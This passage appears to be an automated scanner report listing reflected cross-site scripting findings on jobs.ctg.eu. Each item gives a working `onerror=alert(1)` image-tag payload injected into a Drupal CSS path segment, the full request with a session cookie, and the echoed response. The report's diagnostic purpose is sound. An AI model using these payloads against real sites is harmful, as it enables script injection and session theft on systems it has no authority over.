...[SNIP]...

3.53. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0fad"><img%20src%3da%20onerror%3dalert(1)>1d2bbd370ba was submitted in the REST URL parameter 3. This input was echoed as a0fad"><img src=a onerror=alert(1)>1d2bbd370ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modulesa0fad"><img%20src%3da%20onerror%3dalert(1)>1d2bbd370ba/cck/modules/fieldgroup/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modulesa0fad"><img src=a onerror=alert(1)>1d2bbd370ba-cck-modules-fieldgroup-fieldgroup.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.54. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce390"><img%20src%3da%20onerror%3dalert(1)>3c08ceec826 was submitted in the REST URL parameter 4. This input was echoed as ce390"><img src=a onerror=alert(1)>3c08ceec826 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/cckce390"><img%20src%3da%20onerror%3dalert(1)>3c08ceec826/modules/fieldgroup/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:39:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:39:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-cckce390"><img src=a onerror=alert(1)>3c08ceec826-modules-fieldgroup-fieldgroup.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.55. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e65d8"><img%20src%3da%20onerror%3dalert(1)>e9929ea8807 was submitted in the REST URL parameter 5. This input was echoed as e65d8"><img src=a onerror=alert(1)>e9929ea8807 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/cck/modulese65d8"><img%20src%3da%20onerror%3dalert(1)>e9929ea8807/fieldgroup/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:41:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:41:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-cck-modulese65d8"><img src=a onerror=alert(1)>e9929ea8807-fieldgroup-fieldgroup.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.56. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e73f"><img%20src%3da%20onerror%3dalert(1)>19a202725ce was submitted in the REST URL parameter 6. This input was echoed as 6e73f"><img src=a onerror=alert(1)>19a202725ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/cck/modules/fieldgroup6e73f"><img%20src%3da%20onerror%3dalert(1)>19a202725ce/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:42:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:42:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-cck-modules-fieldgroup6e73f"><img src=a onerror=alert(1)>19a202725ce-fieldgroup.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.57. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff42a"><img%20src%3da%20onerror%3dalert(1)>4df1db9c331 was submitted in the REST URL parameter 7. This input was echoed as ff42a"><img src=a onerror=alert(1)>4df1db9c331 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/cck/modules/fieldgroup/fieldgroup.cssff42a"><img%20src%3da%20onerror%3dalert(1)>4df1db9c331?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:44:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:44:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-cck-modules-fieldgroup-fieldgroup.cssff42a"><img src=a onerror=alert(1)>4df1db9c331 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.58. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa69"><img%20src%3da%20onerror%3dalert(1)>d04d20f30bd was submitted in the REST URL parameter 1. This input was echoed as bfa69"><img src=a onerror=alert(1)>d04d20f30bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitesbfa69"><img%20src%3da%20onerror%3dalert(1)>d04d20f30bd/all/modules/cck/theme/content-module.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:32:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:32:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sitesbfa69"><img src=a onerror=alert(1)>d04d20f30bd-all-modules-cck-theme-content-module.css not-front not-logged-in page-sitesbfa69img-srca-onerroralert1d04d20f30bd no-sidebars">
...[SNIP]...

3.59. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbafa"><img%20src%3da%20onerror%3dalert(1)>d4cc4ccb574 was submitted in the REST URL parameter 2. This input was echoed as cbafa"><img src=a onerror=alert(1)>d4cc4ccb574 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/allcbafa"><img%20src%3da%20onerror%3dalert(1)>d4cc4ccb574/modules/cck/theme/content-module.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:34:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:34:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-allcbafa"><img src=a onerror=alert(1)>d4cc4ccb574-modules-cck-theme-content-module.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.60. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a826d"><img%20src%3da%20onerror%3dalert(1)>07168fe7c99 was submitted in the REST URL parameter 3. This input was echoed as a826d"><img src=a onerror=alert(1)>07168fe7c99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modulesa826d"><img%20src%3da%20onerror%3dalert(1)>07168fe7c99/cck/theme/content-module.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:36:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:36:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modulesa826d"><img src=a onerror=alert(1)>07168fe7c99-cck-theme-content-module.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.61. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0c8"><img%20src%3da%20onerror%3dalert(1)>cb88e4e60ce was submitted in the REST URL parameter 4. This input was echoed as bf0c8"><img src=a onerror=alert(1)>cb88e4e60ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/cckbf0c8"><img%20src%3da%20onerror%3dalert(1)>cb88e4e60ce/theme/content-module.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-cckbf0c8"><img src=a onerror=alert(1)>cb88e4e60ce-theme-content-module.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.62. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc41"><img%20src%3da%20onerror%3dalert(1)>4a59448569d was submitted in the REST URL parameter 5. This input was echoed as 5fc41"><img src=a onerror=alert(1)>4a59448569d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/cck/theme5fc41"><img%20src%3da%20onerror%3dalert(1)>4a59448569d/content-module.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:39:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:39:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-cck-theme5fc41"><img src=a onerror=alert(1)>4a59448569d-content-module.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.63. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c74"><img%20src%3da%20onerror%3dalert(1)>ed85725023d was submitted in the REST URL parameter 6. This input was echoed as 64c74"><img src=a onerror=alert(1)>ed85725023d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/cck/theme/content-module.css64c74"><img%20src%3da%20onerror%3dalert(1)>ed85725023d?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:41:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:41:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-cck-theme-content-module.css64c74"><img src=a onerror=alert(1)>ed85725023d not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.64. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfd76"><img%20src%3da%20onerror%3dalert(1)>99b0fe2a1d7 was submitted in the REST URL parameter 1. This input was echoed as dfd76"><img src=a onerror=alert(1)>99b0fe2a1d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitesdfd76"><img%20src%3da%20onerror%3dalert(1)>99b0fe2a1d7/all/modules/filefield/filefield.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sitesdfd76"><img src=a onerror=alert(1)>99b0fe2a1d7-all-modules-filefield-filefield.css not-front not-logged-in page-sitesdfd76img-srca-onerroralert199b0fe2a1d7 no-sidebars">
...[SNIP]...

3.65. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a0d6"><img%20src%3da%20onerror%3dalert(1)>14b10f530b0 was submitted in the REST URL parameter 2. This input was echoed as 2a0d6"><img src=a onerror=alert(1)>14b10f530b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all2a0d6"><img%20src%3da%20onerror%3dalert(1)>14b10f530b0/modules/filefield/filefield.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:34:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:34:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
